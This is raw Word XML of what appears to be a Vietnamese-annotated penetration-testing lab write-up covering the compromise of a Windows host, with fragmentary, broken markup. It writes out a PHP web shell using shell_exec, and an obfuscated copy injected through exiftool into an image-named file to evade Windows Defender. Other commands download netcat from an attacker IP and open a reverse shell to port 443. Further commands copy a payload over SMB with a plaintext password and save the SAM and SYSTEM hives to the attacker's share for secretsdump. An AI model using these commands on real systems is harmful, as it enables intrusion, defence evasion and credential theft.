          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA4DD1" w14:textId="77777777" w:rsidR="00BD1CE7" w:rsidRDefault="00BD1CE7" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7851B6B0" w14:textId="77777777" w:rsidR="00BD1CE7" w:rsidRP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>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA8781" w14:textId="77777777" w:rsidR="00BD1CE7" w:rsidRP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BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $_GET["wreath"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678D4C95" w14:textId="77777777" w:rsidR="00BD1CE7" w:rsidRP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 xml:space="preserve">    if(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BD1CE7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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32BFDF8C" w14:textId="77777777" w:rsidR="00BD1CE7" w:rsidRP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 xml:space="preserve">        echo "&lt;pre&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD1CE7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BD1C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shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1CE7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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "&lt;/pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EFDB86" w14:textId="77777777" w:rsidR="00BD1CE7" w:rsidRP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C5591A" w14:textId="77777777" w:rsidR="00BD1CE7" w:rsidRP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BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>die(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650BC3A7" w14:textId="46E83A7E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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618DF72" w14:textId="181E3B45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</w:p>
    <w:p w14:paraId="5AD476C5" w14:textId="1AC192AD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1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Obfuscator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bypass window defender:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB4581F" w14:textId="0F24A934" w:rsidR="00BD1CE7" w:rsidRDefault="000235DA" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00BD1CE7" w:rsidRPr="00124926">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.gaijin.at/en/tools/php-obfuscator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BD1C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A41A7D" w14:textId="6098D99E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exiftool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comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE5B42E" w14:textId="05DDB854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1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Comment="&lt;?php \$p0=\$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>base64_decode('d3JlYXRo')];if(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BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?&gt;" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>background.jpg.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1CE7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25F5321A" w14:textId="35AF6291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</w:p>
    <w:p w14:paraId="7D4CA4E3" w14:textId="5C07785E" w:rsidR="00BD1CE7" w:rsidRDefault="00BD1CE7" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD1C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9ACBBF" wp14:editId="4A06E721">
            <wp:extent cx="5943600" cy="15151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83CB" w14:textId="4049CDD3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</w:p>
    <w:p w14:paraId="6A69F1A4" w14:textId="6C9F5825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obfuscate </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA26D0F" w14:textId="77777777" w:rsidR="009A6D42" w:rsidRPr="009A6D42" w:rsidRDefault="009A6D42" w:rsidP="009A6D42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9A6D42">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>git clone https://github.com/int0x33/nc.exe/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC0296" w14:textId="617320F8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nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76339F31" w14:textId="07EAE3C0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curl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100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C4A788" w14:textId="592FE390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r w:rsidRPr="009A6D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl http://10.50.85.26//nc64.exe -o c:\\windows\\temp\\nc-dai.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D39E89A" w14:textId="68201776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r w:rsidRPr="009A6D4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7EF5F5" wp14:editId="40A72AC1">
            <wp:extent cx="5943600" cy="368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F28B" w14:textId="33F300C8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</w:p>
    <w:p w14:paraId="0C71BC2C" w14:textId="15FC8454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lắng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nghe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6269C8C6" w14:textId="7EB1FC8D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r w:rsidRPr="009A6D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32A39D" wp14:editId="6ABB7135">
            <wp:extent cx="5115639" cy="13527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F0B" w14:textId="2BB44D19" w:rsidR="009A6D42" w:rsidRDefault="009A6D42" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell.exe c:\\windows\\temp\\nc-dai.exe 10.50.85.26 443 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55992460" w14:textId="23955892" w:rsidR="009A6D42" w:rsidRDefault="003567B7" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003567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599C07" wp14:editId="37A3D7AA">
            <wp:extent cx="5943600" cy="4121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9B47" w14:textId="5830D857" w:rsidR="003567B7" w:rsidRDefault="00BB6B7D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shell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</w:p>
    <w:p w14:paraId="64E8687B" w14:textId="576436F9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B6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami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BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="198B3558" w14:textId="7A4EE63E" w:rsidR="00BB6B7D" w:rsidRDefault="00BB6B7D" w:rsidP="00BB6B7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B6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9DCF44" w14:textId="77777777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</w:p>
    <w:p w14:paraId="73B3B9E0" w14:textId="3F2AA412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04CC7F" wp14:editId="449910E9">
            <wp:extent cx="5943600" cy="3162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0FD1" w14:textId="77777777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</w:p>
    <w:p w14:paraId="2F2262C3" w14:textId="2BF43A94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lastRenderedPageBreak/>
        <w:t xml:space="preserve">wmic service get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name,displayname</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,pathname,startmode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BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>findstr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/v /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B7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"C:\Windows"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378078C" w14:textId="6323D350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B6B7D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qc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SystemExplorerHelpService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07F5E04B" w14:textId="706E810C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379E69" wp14:editId="176F82A9">
            <wp:extent cx="5943600" cy="33743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9328" w14:textId="1E9BDE6A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B6B7D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"get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acl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-Path 'C:\Program Files (x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>86)\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System Explorer' | format-list"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB059CE" w14:textId="42F5CC9E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6026A4" wp14:editId="50575F74">
            <wp:extent cx="5943600" cy="25120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E193" w14:textId="272B54C4" w:rsidR="00BB6B7D" w:rsidRDefault="00BB6B7D" w:rsidP="00BB6B7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2771F3EB" w14:textId="77777777" w:rsidR="007444AC" w:rsidRDefault="007444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5FB0C1" w14:textId="2ADAD033" w:rsidR="000061D0" w:rsidRDefault="000061D0" w:rsidP="00BB6B7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smb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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CD4F6" w14:textId="4896A3D6" w:rsidR="00BB6B7D" w:rsidRDefault="000061D0" w:rsidP="00BB6B7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061D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061D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> smbserver.py share /home/kali/Desktop/ -smb2support -username user -password s3cureP@ssword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561812B2" w14:textId="74921B37" w:rsidR="000061D0" w:rsidRDefault="000061D0" w:rsidP="00BB6B7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242B040B" w14:textId="77066CDB" w:rsidR="000061D0" w:rsidRDefault="00D10452" w:rsidP="00BB6B7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D104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8AFCFA" wp14:editId="28D3DD72">
            <wp:extent cx="5943600" cy="13068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410B" w14:textId="77777777" w:rsidR="00BB6B7D" w:rsidRDefault="00BB6B7D" w:rsidP="00BB6B7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D220E5" w14:textId="77777777" w:rsidR="00BB6B7D" w:rsidRPr="00BB6B7D" w:rsidRDefault="00BB6B7D" w:rsidP="00BB6B7D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t>net use \\10.50.85.26\share /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>USER:user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> s3cureP@ssword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CD162" w14:textId="29287CA8" w:rsidR="00BB6B7D" w:rsidRPr="00BB6B7D" w:rsidRDefault="00BB6B7D" w:rsidP="00BB6B7D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t xml:space="preserve">copy \\10.50.85.26\share\Wrapper.exe %TEMP%\wrapper-dai.exe   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C7D9F5" w14:textId="5EA98A38" w:rsidR="00BB6B7D" w:rsidRDefault="00BB6B7D" w:rsidP="00BB6B7D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t>net use \\10.50.85.26\share /del</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E263ADF" w14:textId="107F1ACF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47C06F" wp14:editId="12285261">
            <wp:extent cx="5943600" cy="1887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38AF" w14:textId="18FA7CD5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</w:p>
    <w:p w14:paraId="5C93B2DF" w14:textId="4530B43C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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC4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F8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CC4F8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kali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lắng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 port 443,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vừa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copy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</w:p>
    <w:p w14:paraId="62BCA41F" w14:textId="56A9F4B5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628182" wp14:editId="0F0F3D29">
            <wp:extent cx="4763165" cy="543001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A10A" w14:textId="33D3B2A3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</w:p>
    <w:p w14:paraId="5C4E5133" w14:textId="77777777" w:rsidR="00DF5F30" w:rsidRDefault="00DF5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78EA4F" w14:textId="71621F0E" w:rsidR="00BB6B7D" w:rsidRDefault="00145DA8" w:rsidP="00BD1C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187257" w14:textId="0D7BE6BB" w:rsidR="00BB6B7D" w:rsidRDefault="00BB6B7D" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6B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0E1076" wp14:editId="2F5A0C85">
            <wp:extent cx="5943600" cy="34721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5784" w14:textId="60725E18" w:rsidR="00F44FFE" w:rsidRDefault="00F44FFE" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E90B2B6" w14:textId="7C432868" w:rsidR="0025467D" w:rsidRDefault="0025467D" w:rsidP="00BD1C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Leo thang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377216DE" w14:textId="77777777" w:rsidR="000235DA" w:rsidRDefault="000235DA" w:rsidP="00BD1CE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD39666" w14:textId="3B6A68CC" w:rsidR="00015D9E" w:rsidRPr="000235DA" w:rsidRDefault="00015D9E" w:rsidP="00015D9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5D9E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015D9E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015D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SystemExplorerHelpService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F99DCE3" w14:textId="1D0B8EC9" w:rsidR="002E3859" w:rsidRDefault="002E3859" w:rsidP="002E3859">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>net use \\10.50.85.26\share /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00015D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:10.50.85.26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00015D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user s3cureP@ssword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE2C24" w14:textId="50F03D50" w:rsidR="002E3859" w:rsidRDefault="002E3859" w:rsidP="00015D9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66D658" w14:textId="529A0386" w:rsidR="002E3859" w:rsidRPr="002E3859" w:rsidRDefault="000235DA" w:rsidP="002E3859">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000235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985FCAD" wp14:editId="1FF40DBE">
            <wp:extent cx="5943600" cy="6883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D291" w14:textId="77777777" w:rsidR="002E3859" w:rsidRPr="002E3859" w:rsidRDefault="002E3859" w:rsidP="002E385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67FD3B" w14:textId="77777777" w:rsidR="002E3859" w:rsidRPr="002E3859" w:rsidRDefault="002E3859" w:rsidP="002E3859">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E3859">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reg.exe save HKLM\SAM \\10.50.85.26\share\sam.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14425A9A" w14:textId="1256C12C" w:rsidR="002E3859" w:rsidRDefault="002E3859" w:rsidP="002E3859">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E3859">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reg.exe save HKLM\SYSTEM \\10.50.85.26\share\s</w:t>
      </w:r>
      <w:r w:rsidR="00207383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ystem</w:t>
      </w:r>
      <w:r w:rsidRPr="002E3859">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB20292" w14:textId="6D8D9F2A" w:rsidR="000235DA" w:rsidRDefault="000235DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000235D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200385" wp14:editId="60E98BA3">
            <wp:extent cx="5943600" cy="1220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519D5E3" w14:textId="099090B8" w:rsidR="00015D9E" w:rsidRDefault="000235DA" w:rsidP="00015D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000235DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>secretsdump.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000235DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000235DA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0235DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sam.bak</w:t>
